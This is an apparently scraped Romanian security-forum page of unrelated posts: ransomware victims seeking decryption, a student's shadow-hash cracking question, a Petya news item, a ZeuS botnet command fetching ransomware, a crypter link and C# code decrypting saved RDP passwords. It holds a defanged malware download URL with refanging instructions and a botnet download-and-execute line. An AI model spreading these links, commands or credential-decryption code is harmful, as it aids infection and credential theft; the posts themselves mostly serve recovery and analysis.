Search the Community

Buna ziua. Ajutor. Am avut marea suparare sa intru in contact cu ransomware-ul coot care le adauga o extensie suplimentara .coot la fisiere de tip jpg,nef , mov,doc,docx,xls,xslx,ppt,pptx,pdf,mpg,mpeg,zip,iso,nrg,rw2,cr2,mp4,avi,mts,m2t,m2ts,psdphp,html,xml,mhtml,zip,rar,fisiere din structura Revisal ,Sagasoft (frx,frt,rvs,cdx,xdp,fdb,dbf,revisal.db) Este o versiune a virusului STOP DEJAVU cel mai veche de luna august . S-au incercat decriptari cu soft-uri gen Emsisoft (soft facut tot de creatorii virusului) si alte softuri nu mai stiu care. A incercat cineva din Linux si nu a mers Atasez arhiva zip pe care am parolat-o c parola " Expcontabil!2 " care contine o pereche fisier sursa (fisier neinfectat) ,acelasi fisier afectat si nota de rascumparare. linkul spre virus este hxxp://www[.]petedefertoss[.]com/0wry-cr8gnlgv/PortraitPro[.]exe inlocuiti cei doi x cu t si eliminati parantezele patrate care incadreaza punctele

Salutare, imi cer scuze daca am gresit sectiunea sau e o intrebare mult prea usoara pt acest forum ( e prima mea postare ). Am primit la facultate un cod pt spart o parola shadow ( era dintr-un exemplu) iar dupa ce am testat acel exemplu, am primit un alt hash pe care sa-l spargem, insa fara niciun cod sursa. Deci mai pe scurt, poate cineva sa ma ajute sa modific acel exemplu primit pt hash-ul pe care trebuie sa-l sparg? Aici e exemplul primit de la facultate. Acum enuntul problemei de care nu-i dau de cap suna asa : " Find the password that corresponds to the following shadows entry, having in mind that the character set is {a, b, c, 1, 2, !, @, #} and the non-alphanumerical symbols occur only at the end of the password ". tom:$6$SvT3dVpN$lwb3GViLl0J0ntNk5BAWe2WtkbjSBMXtSkDCtZUkVhVPiz5 X37WflWL4k3ZUusdoyh7IOUlSXE1jUHxIrg29p.:16471:0:99999:7::: (asta e hash-ul pe care trebuie sa-l sparg) Ma poate ajuta cineva sa sparg acest shadow, utilizand exemplul de mai sus ? Multumesc frumos!

Petya ransomware victims can now unlock infected computers without paying. An unidentified programmer has produced a tool that exploits shortfalls in the way the malware encrypts a file that allows Windows to start up. In notes put on code-sharing site Github, he said he had produced the key generator to help his father-in-law unlock his Petya-encrypted computer. The malware, which started circulating in large numbers in March, demands a ransom of 0.9 bitcoins (£265). It hid itself in documents attached to emails purporting to come from people looking for work. Security researcher Lawrence Abrams, from the Bleeping Computer news site, said the key generator could unlock a Petya-encrypted computer in seven seconds. But the key generator requires victims to extract some information from specific memory locations on the infected drive. And Mr Abrams said: "Unfortunately, for many victims extracting this data is not an easy task." This would probably involve removing the drive and then connecting it up to another virus-free computer running Windows, he said. Another tool can then extract the data, which can be used on the website set up to help people unlock their computer. Independent security analyst Graham Cluley said there had been other occasions when ransomware makers had "bungled" their encryption system. Cryptolocker, Linux.encoder and one other ransomware variant were all rendered harmless when their scrambling schemes were reverse-engineered. "Of course," said Mr Cluley, "the best thing is to have safety secured backups rather than relying upon ransomware criminals goofing up." SOURCE

Generic ransomware pushed to small ZeuS botnet machines by script: user_execute hxxp://ge.tt/api/1/files/4k8mPe82/0/blob?download >> (informations.exe) zeus script.png (835.88 KiB) Viewed 115 times ec2b6ecfc8ca67f9357b6550166a0838 informations.exe (UPX) 6ec6069728a91a04407283bc6bf208b7 UNPACKED Some generic ransomware junk..run in VM it asks for a password to decrypt files so I thought I would try to crack. winxp.png (590.39 KiB) Viewed 115 times I'm not a great RE like most ppl on here so I gave up and just patched the binary Change 00401C19 > JMP 0040124F (decryption routine) Attached are samples and patched binary in case anyone needs to unlock stuff... I was surprised, the malware does decrypt everything.. I did not look into the encryption routine or the password too much, but I'm sure someone around here can figure it out. Download Source

Un crypter/decrypter all in one.Cred ca este destul de folositor.Aveti si un scan pe VirusTotal. VirusTotal Download Link Enjoy.

As some of you requested, I've added a class to decrypt passwords found in *.rdp files. To work with this class add the DLL to references, include the namespace in you're class "using DataProtection;" and use the two functions provided by DataProtectionWrapper: Encrypt(string) and Decrypt(string) The repository can be found here: hg clone https://bitbucket.org/rokill3r/rdppassworddecrypter DLL can be found here: DataProtection.dll using System; using System.Collections.Generic; using System.Linq; using System.Text; using DataProtection; namespace RdpPasswordDecrypter { class Program { static void Main(string[] args) { try { string password = "01000000D08C9DDF0115D1118C7A00C04FC297EB01000000B03D76F7FF29E741AC1991D9E850476500000000080000007000730077000000106600000001000020000000DA8BB4AC41DE92695BF32E8F756F6C7EA1A7D939EE98C99D79740DF7A5DD66B7000000000E8000000002000020000000C1CF8B672062B84AC36624E43D316383B6ADB08D026A9A1C5DF78162C04D421820000000D94E470B71E687C0A4DF24E2800983C7071AAC55B0122FCD8AD7F490F932899B4000000024356DC7D805EEF60CEEB2F3D0D9232CD488C0C2882950B7CE10810480E61997307B6C1DC95C263033178F4272458BA6CCAF8F84487F61677A5A291265582964"; Console.WriteLine("Decrypting ..."); Console.WriteLine("Password: " + DataProtectionWrapper.Decrypt(password)); } catch (Exception ex) { Console.WriteLine(ex.Message); } } } } Log output: Decrypting ... Password: rstcenter.com Press any key to continue . . . Alien

Salut, Am avut pe laptop instalat Windows 7 cu Pgp si Wde activat pe tot hdd-ul. Pe una din partitii am instalat ubuntu, iar dupa ce am dat restartul necesar instalarii am vazut doar ext4 ,iar partiriile de windows criptate nu mai sunt vizibile.Cauzele le stiu acum, problema mea este cum recuperez datele de pe partitiile criptate cu pgp? Mentionez ca am pass si am access la mailul unde e cheia. Astept o solutie si multumesc pentru intelegere.